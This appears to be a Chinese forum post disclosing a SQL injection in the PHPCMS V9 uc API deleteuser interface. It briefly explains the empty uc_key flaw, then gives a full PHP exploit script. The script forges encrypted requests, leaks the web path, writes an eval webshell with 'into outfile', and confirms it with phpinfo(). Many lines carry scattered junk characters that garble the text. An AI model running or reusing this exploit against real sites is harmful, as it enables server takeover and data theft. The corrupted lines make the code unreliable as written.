PHPCMS V9 uc API SQL注入漏洞

admin

PHPCMS V9版于2010年推出，是应用较为广泛的建站工具。第三方数据显示，目前使用PHPCMS V9搭建的网站数量多达数十万个，包括联合国儿童基金会等机构网站，以及大批企业网站均使用PHPCMS V9搭建和维护。
  |( z) T% R) K/ [5 a2 s: o% r3 P3 y& Z7 A
- b& y& k& l% N7 v7 E. H9 b所有使用PHPCMSV9搭建的网站均存在SQL注入漏洞，可能使黑客利用漏洞篡改网页、窃取数据库，甚至控制服务器。未启用ucenter服务的情况下，uc_key为空，define('UC_KEY', pc_base::load_config('system', 'uc_key'));deleteuser接口存在SQL注入漏洞。若MYSQL具有权限，可直接get webshell。

漏洞分析：
1.未启用ucenter服务的情况下uc_key为空
, A3 c1 I) A0 Idefine('UC_KEY', pc_base::load_config('system', 'uc_key'));
0 N( P+ H  f7 p2. deleteuser接口存在SQL注入漏洞，UC算法加密的参数无惧GPC,程序员未意识到$get['ids']会存在SQL注入情况。
8 ~) N3 B) `; g/ ^9 G! d    public function deleteuser($get,$post) {
        pc_base::load_app_func('global', 'admin');
        pc_base::load_app_class('messagequeue', 'admin' , 0);
        $ids = new_stripslashes($get['ids']);
# [; f6 _" O0 b. l' [        $s = $this->member_db->select("ucuserid in ($ids)", "uid");
( l- f' l& C% iSQL语句为
  W1 }  [' L& v" H$ PSELECT `uid` FROM `phpcmsv9`.`v9_sso_members` WHERE ucuserid in ($ids)
3 x# ~+ x% }# L3 O( S: h5 n$ b
利用代码，随便拼了个EXP，找路径正则写得很挫有BUG，没有注其他表了，懒得改了，MYSQL有权限的话直接get webshell
<?php
1 _. K# }, u, Z  Jprint_r('
---------------------------------------------------------------------------
& @+ b; u& T$ l, P  B& ^3 ?PHPcms (v9 or Old Version) uc api sql injection 0day
by rayh4c#80sec.com
---------------------------------------------------------------------------
( O$ P$ X3 @4 }');

if ($argc<3) {
. J2 S* e* P' ~+ b& T& S% s$ c7 p( [% d    print_r('
---------------------------------------------------------------------------
Usage: php '.$argv[0].' host path OPTIONS
7 X6 D+ r0 Z- f6 o4 Zhost:      target server (ip/hostname)
8 |  l! A$ o3 _' e8 B/ \path:      path to phpcms
Options:
-p[port]:    specify a port other than 80
$ X% A9 }* u# R2 ] -P[ip:port]: specify a proxy
, K0 P8 I: o& Y; VExample:
php '.$argv[0].' localhost /
php '.$argv[0].' localhost /phpcms/ -p81
/ J% z0 ^) L( tphp '.$argv[0].' localhost /phpcms/ -P1.1.1.1:80
, q# j  _. w, w7 o" g/ M) x9 S4 z- m---------------------------------------------------------------------------
');
9 h4 G! \  r1 p' n' f    die;
}

& ?7 ~1 Z' j9 r* M* p) O: V8 Nerror_reporting(7);
: y$ Q4 ~$ ^" ~# |2 U3 w1 {8 ^4 gini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
, |5 u8 M2 j8 s* P# e4 y
% h' I8 G5 o, Bfunction quick_dump($string)
) U( J1 I+ p( \) _; H9 Q{
+ f+ ~# x$ m- M9 F: V, i0 J, G$ W  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
% a3 W% K" F; b- ?' Q1 o' W! M   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
* @5 y  n2 P$ h# N   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
/ s1 u! Y- n  e   {$exa.=" ".dechex(ord($string[$i]));}
( v- B/ a( N5 _/ ?   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
8 L% r3 l' Q; X- |0 p; n return $exa."\r\n".$result;
4 l! J5 w/ @2 U% c. Z5 y8 J}
; n! e* E7 z- g5 j2 d5 _$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
* f; ^" h- d9 P! s) s
function send($packet)
3 |& K- A' e1 w& W2 n' _{
" s- M; e, f, G; {0 v# M5 J: f  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
) o' J- k1 M- |1 e  }! B    $ock=fsockopen(gethostbyname($host),$port);
. f) ?9 l/ Y( }+ o: ~    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
1 w7 b' a/ I. u0 P, O    }
6 G0 _  z, k( S0 d  }
9 o. K3 _% H- b: J: f( O/ I0 O  else {
1 [8 {; t) i4 I, \, _        $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
( v0 O) C& u7 r% n; N, {0 H      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    $parts[1]=(int)$parts[1];
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
) T- i6 U' o) B      echo 'No response from proxy...';die;
        }
2 ~1 X" K, ]0 }( L+ Z  }
3 p! ~. \6 \% B  h# p8 w  fputs($ock,$packet);
  if ($proxy=='') {
6 c* m- {6 J! V! X    $html='';
    while (!feof($ock)) {
  l3 r9 i) a2 X- z      $html.=fgets($ock);
    }
  }
+ ?- k0 I( E) F) m5 t8 P  else {
    $html='';
  [9 T8 v8 H: ]. ?% g0 O    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
  A/ j* S5 K5 s' U* b7 r1 P    }
8 ?: J8 q% k" b5 H$ v6 ]+ @  }
( U/ Z% V; u. }  fclose($ock);
! b' o) e3 e8 x4 B}

$host=$argv[1];
$path=$argv[2];
: X8 U1 a- |+ l$port=80;
$proxy="";
6 m+ X2 }0 r- v- q! I" Kfor ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
  $port=(int)str_replace("-p","",$argv[$i]);
& X( W$ f  t/ y* N}
0 r" K6 s% B3 p; F( |if ($temp=="-P")
{
$ `; \4 Y+ _% ~' j  $proxy=str_replace("-P","",$argv[$i]);
}
}
& C2 s0 ?5 Q2 R2 }8 s
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
" Y  q) G  g9 V" G! q
) q8 q! r) g. |function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
/ v; G6 ]1 T$ W) Z# [; r
. a; E5 H  Y. Q/ S3 ~    $ckey_length = 4;
% k. [0 g$ o. S# x: _3 a. n
% F/ b" O& O# G' W( _) r& g4 L    $key = md5($key ? $key : '');
    $keya = md5(substr($key, 0, 16));
, q: [9 `; }1 _, Y; L7 ^0 ?% @    $keyb = md5(substr($key, 16, 16));
. @! e9 f. A; q. }    $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';

    $cryptkey = $keya.md5($keya.$keyc);
* M2 Q, F; ^; V+ E- E/ ~1 @5 |    $key_length = strlen($cryptkey);
8 ?* z0 ^' d, x
    $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
# Z: L. X( s: X% z    $string_length = strlen($string);
* {7 U7 k$ {& r
    $result = '';
+ A; h% s/ h, r& o* r    $box = range(0, 255);

    $rndkey = array();
* y/ q+ i% N9 a) C" `8 O    for($i = 0; $i <= 255; $i++) {
' f' U3 B5 v+ g  l& u8 k        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
    }

0 ^2 r6 |+ D& T+ N: I    for($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
1 J* {" ~* X' Q! `. n+ `/ |        $tmp = $box[$i];
        $box[$i] = $box[$j];
$ A8 Y7 [: G8 V+ v* l( d        $box[$j] = $tmp;
    }

    for($a = $j = $i = 0; $i < $string_length; $i++) {
        $a = ($a + 1) % 256;
3 F" o/ u0 y" {/ P        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a];
. q7 e) d3 q; u2 m. d* V  }% D        $box[$a] = $box[$j];
4 \2 ^3 `* \" G( {- f- t$ {" W        $box[$j] = $tmp;
: }& m7 F6 Y& ?        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
- v+ u+ ^, m( C' G$ T& N    }

    if($operation == 'DECODE') {
        if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
            return substr($result, 26);
        } else {
            return '';
        }
, E) H' k5 p9 @    } else {
        return $keyc.str_replace('=', '', base64_encode($result));
    }

}
0 F- T4 Y+ b/ D5 h! ?  {
& @; i" ~  W% Y' A1 f$SQL = "time=999999999999999999999999&ids=1'&action=deleteuser";
. F* |- m2 S9 o- P4 ?( H8 \$SQL = urlencode(authcode($SQL, "ENCODE", ""));
, q7 S% @/ ?! y* n! Secho "[1] 访问 http://".$host.$p."phpsso_server/api/uc.php?code=".$SQL."\n";
$packet ="GET ".$p."phpsso_server/api/uc.php?code=".$SQL." HTTP/1.0\r\n";
$packet.="User-Agent: Mozilla/5.0\r\n";
3 I; G0 r8 t8 f: s; Z6 M% w$packet.="Host: ".$host."\r\n";
: @4 {( A, ~4 ]$ O, c& i% N$packet.="Connection: Close\r\n\r\n";
send($packet);
if(strpos($html,"MySQL Errno") > 0){
echo "[2] 发现存在SQL注入漏洞"."\n";
/ B# q( {. S, Zecho "[3] 访问 http://".$host.$p."phpsso_server/api/logout.php \n";
$packet ="GET ".$p."phpsso_server/api/logout.php"." HTTP/1.0\r\n";
$packet.="User-Agent: Mozilla/5.0\r\n";
5 E6 R- ]% p/ b( b$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
send($packet);
preg_match('/[A-Za-z]?[:]?[\/\x5c][^<^>]+[\/\x5c]phpsso_server[\/\x5c]/',$html, $matches);
//print_r($matches);
- B) V$ u, P3 M# {3 C* ?: mif(!empty($matches)){
) b' |. @1 w9 C1 ]' ^' G$ Decho "[4] 得到web路径 " . $matches[0]."\n";
4 v, K5 {2 B/ Z" B4 N8 secho "[5] 尝试写入文件 ". str_replace("\\","/",$matches[0]) ."caches/shell.php"."\n";
, p& p$ m9 Y0 I+ x& w. u, n8 T/ c$SQL = "time=999999999999999999999999&ids=1)";
5 U! R2 }, H. o0 s$ m5 `$SQL.=" and 1=2 union select '<?php eval($"."_REQUEST[a]);?>' into outfile '". str_replace("\\","/",$matches[0]) ."caches/shell.php'#";
( ^! A4 E) B0 t. ~0 @$SQL.="&action=deleteuser";
$SQL = urlencode(authcode($SQL, "ENCODE", ""));
3 q/ N) d. Z9 O2 g- }* i& techo "[6] 访问 http://".$host.$p."phpsso_server/api/uc.php?code=".$SQL."\n";
  D  q+ v/ k5 C+ W! L$ }- s0 E$packet ="GET ".$p."phpsso_server/api/uc.php?code=".$SQL." HTTP/1.0\r\n";
$ `6 @4 D, _" P& `$packet.="User-Agent: Mozilla/5.0\r\n";
$packet.="Host: ".$host."\r\n";
3 D! t0 c/ a' c  L- l$packet.="Connection: Close\r\n\r\n";
! Y0 A* _7 t- N! jsend($packet);
if(strpos($html,"Access denied") > 0){
2 s: t5 \$ u1 ~/ g7 D+ secho "[-] MYSQL权限过低 禁止写入文件 ";
& B. D' O! ]+ m' udie;
+ i+ d1 a+ h# a7 Y2 [! M* ^}
0 y* O+ I; y0 G: k& L( k0 N$ Aecho "[6] 访问 http://".$host.$p."phpsso_server/caches/shell.php"."\n";
9 J6 a4 i/ R. b! Y4 B# ~$packet ="GET ".$p."phpsso_server/caches/shell.php?a=phpinfo(); HTTP/1.0\r\n";
$packet.="User-Agent: Mozilla/5.0\r\n";
$packet.="Host: ".$host."\r\n";
# Q5 W4 L+ ?  u. j+ n& W. k$packet.="Connection: Close\r\n\r\n";
send($packet);
if(strpos($html,"<title>phpinfo()</title>") > 0){
6 e1 Z8 g6 w" P" J" I2 oecho "[7] 测试phpinfo成功！shell密码是a ! enjoy it ";
}
}else{
' w+ B6 G/ c: G& H& Recho "[-]未取到web路径 ";
}
}else{
echo "[*]不存在SQL注入漏洞"."\n";
0 k  I1 i( z, H, H}
# ]7 H9 z* L+ o
?>